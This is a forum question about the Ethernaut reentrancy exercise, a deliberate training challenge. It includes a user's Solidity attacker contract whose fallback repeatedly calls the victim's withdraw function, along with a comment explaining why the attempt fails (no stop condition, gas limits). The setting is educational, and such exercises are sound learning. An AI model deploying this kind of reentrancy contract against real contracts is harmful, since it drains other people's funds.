# Reentrancy attack exercise does not work

Tags: solidity, reentrant-attacks

I’m trying to solve the reentrancy exercise from the Ethernaut project - https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D. I created a hacking contract but it does not work.

Here is the scenario that I’m executing:

- I donate 1 ether from the test account and 0.4 ether from the contract that will perform the hack
- At this point, a victim contract has 1.4 ether in total
- I call withdraw function with 0.1 ether as amount to withdraw. In the fallback method, there is a withdraw function call as well.

After the above, I would expect that the victim contract would have a 0 balance. Unfortunately, its balance is the same 1.4 ether. Here is my whole hack contract.

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract ReEntryHack {
    address payable public addressToHack;

    function setVictimAddress(address payable _addressToHack) public {
        addressToHack = _addressToHack;
    }

    function donate(address donationAddress, uint amount) public payable {
        bytes memory payload = abi.encodeWithSignature("donate(address)", address(donationAddress));
        addressToHack.call{value: msg.value}(payload);
    }

    function maliciousWithdraw() public payable {
        bytes memory payload = abi.encodeWithSignature("withdraw(uint256)", 0.1 ether);
        payable(addressToHack).call(payload);
    }
    
    fallback() external payable {
        maliciousWithdraw();
    }
}
```

Any idea why the hack does not work?

Comment: Your hack is missing a stop condition, so the contract could fail with an out of gas if it reentries too many times. I also could fail when the contract run out of ether.